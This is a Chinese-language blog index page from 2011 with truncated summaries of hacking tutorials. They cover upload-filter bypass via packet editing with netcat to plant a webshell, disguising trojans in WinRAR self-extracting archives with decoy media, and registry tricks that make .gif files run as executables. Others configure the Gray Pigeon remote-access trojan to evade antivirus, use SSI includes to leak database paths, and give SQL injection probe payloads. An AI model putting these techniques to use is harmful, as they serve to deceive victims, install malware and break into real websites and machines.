上一页 1 ··· 8 9 10 11 12 13 下一页
摘要: 目标:学会抓取上传的数据包文件,并用工具进行修改,学会使用NETCAT(简称NC)提交数据包以及使用工具抓取数据包 要点:我们的电脑被称为客户端,网站称为服务端,上网从网站上获取信息,或者向网站上提交信息,其根本都是客户端和服务端之间信息传递的过程,这个过程以数据包的形式实现的,如果能够抓取到提交的数据包,并进行修改,则可以达到改变在服务器上生成的结果的目的.对数据包进行修改后提交达到攻击的目的,其中一个精典的应用是对上传数据包的修改绕过在服务端的过滤,直接上传脚本木马获得WEBSHELL.首先登陆网站,进入上传页面,用抓包工具选中IE中的这个页面,上传ASP木马,这一次的上传是会失败的,因为 阅读全文
posted @ 2011-04-27 12:22 WHaa_(T_T) 阅读(1399) 评论(0) 推荐(0) 编辑
摘要: 目的:掌握基础的VBS脚本,“改变”木马后缀名不引起警觉,他点击木马后会先运行一段我们装备好的素材,音乐或图片,然后才执行木马 诱骗对方运行木马前工作:根据需要准备一款木马,一个ICO图标文件(媒体文件,图片文件的图标),安装WINRAR,一个素材文件(一段动画,一首MP3,或一张图片都可以) 操作步聚:1、将用来迷惑目标的素材压缩成为RAR文件.并将脚本文件,木马添加其中2、加入再点击功能按钮的自解压模式选项,再选择高级自解压选项3、在常规选项中,设解压路径为%systemroot%\system32\解压后运行设为我们的脚本4,在模式选项中,设置安静模式为全部隐藏,覆盖方式为覆盖所有文件5 阅读全文
posted @ 2011-04-27 12:07 WHaa_(T_T) 阅读(203) 评论(0) 推荐(0) 编辑
摘要: 知识要点:最常见几种脚本类型:PHP,ASP(ASPX),JSP,常见WEB服务程序:Microsoft IIS,Apache,常见数据库服务程序:ACCSECC,MYSQL,MSSQL,Oracle网站脚本,WEB服务程序.数据库服务程序常见的组合包括: PHP+Apache+MYSQLASP+Microsoft IIS+ACCSECC ASP+Microsoft IIS+mssqlASPX+Microsoft IIS+MssqlJSP+TOMCAT+Oracle(比较少见) 上面列举的搭配只是最常见并不是绝对,例如也有PHP+Microsoft IIS+MSSQL判断方法,一、通过后缀判定 阅读全文
posted @ 2011-04-27 11:49 WHaa_(T_T) 阅读(445) 评论(0) 推荐(0) 编辑
摘要: 学习目标:掌握手工ACCCESS注入的方法,几个常用语句的使用学习要点:ACCESS数据库的注入与MSSQL不同,要得到表名,字段,以及字段的内容不能用MSSQL"暴"的方法直接得到(什么是"暴"以后在戒绍MSSQL注入时会介绍),ACCESS只能用猜解出表名和字段,然后再猜解出字段的长度,最后把字段的内容从第一位到第N位一个个猜解出来,采用的猜解方法类似玩一个游戏猜大小,比如一个数字,猜是否大于100如果不是,刚猜是否大于1,如果为正确,那么再猜是否大于50,如果正确,则再猜是否大于80,一直这样猜下去,这种猜解字段内容的方法,被称为"折半猜 阅读全文
posted @ 2011-04-27 11:35 WHaa_(T_T) 阅读(269) 评论(0) 推荐(0) 编辑
摘要: 1、site: 当我们用site提交查询的时候,Google会限制查询仅在某个网站,或是某个域下面进行。例 [admissions site:www.lse.ac.uk],提交这个查询仅仅会搜索网站 www.lse.ac.uk 下面关于admissions的信息。我们还可以限制搜索 仅在域下面进行, 例 [javascrip site:edu.cn],提交这个查询,仅仅在教育网查询关于javascrip 的信息。(site:后面不能跟空格,且site命令可以配合其它命令进行)2、inurl: 当我们用inurl进行查询的时候,Google会返回那些在URL (网址)里边包含了我们查询关键词的网 阅读全文
posted @ 2011-04-25 05:39 WHaa_(T_T) 阅读(1348) 评论(0) 推荐(0) 编辑
摘要: 你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗?一个小技巧可以把任意后缀文件当做EXE程序文件来运行。 更改exe为gif: @echo off color 1A ECHO Windows Registry Editor Version 5.00>gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]>>gif.reg ECHO "Content Type"="application/x-msdownload">>gif.reg ECHO @=&quo 阅读全文
posted @ 2011-04-24 16:44 WHaa_(T_T) 阅读(205) 评论(0) 推荐(0) 编辑
摘要: 灰鸽子上线原理:本地木马控制端通过访问固定网络(我们申请的空间),来获取与宿主机的连接,从而进行控制。1、配置灰鸽子(表管DNS上线和FTP上线了,省的越搞越迷糊)①申请空间:在3322申请免费空间,建立动态域名刚申请的hahack,域名就是hahack.3322.orgb、\"安装选项\"里填上$(WinDir)\\system32\\smlogsvc.exec、\"启动项设置\"里填上 显示名称:SysmonLog 服务名称:SysmonLog 描述信息:Performance Logs and Alerts Service改这些为过360,剩下的别 阅读全文
posted @ 2011-04-24 15:43 WHaa_(T_T) 阅读(746) 评论(0) 推荐(0) 编辑
摘要: 阅读全文
posted @ 2011-04-24 15:07 WHaa_(T_T) 阅读(249) 评论(0) 推荐(0) 编辑
摘要: 当网站不允许上传 asp cer cdx htr等文件时, 上传一个stm文件, 内容为: <!--#include file="conn.asp"--> 直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦! 并且又看了那篇shtml的介绍后,恍然大悟,终于明白了! 原来就是如上所说的, <!--#include file="conn.asp"--> 就是一条SSI指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它HTML文档一样显示info.h 阅读全文
posted @ 2011-04-24 14:59 WHaa_(T_T) 阅读(296) 评论(0) 推荐(0) 编辑
摘要: 数字型:and 1=1 and 1=2 判断是否存在注入字符型:' and '1'='1 ' and '1'='2搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%IIS报错情况下使用: and user>0 (判断是ACCESS还是MSSQL)不报错则使用各自数据库特性来判断and (select count(*) from msysobjects)>0 (返回权限不足access数据库)and 阅读全文
posted @ 2011-04-19 19:44 WHaa_(T_T) 阅读(656) 评论(0) 推荐(0) 编辑
上一页 1 ··· 8 9 10 11 12 13 下一页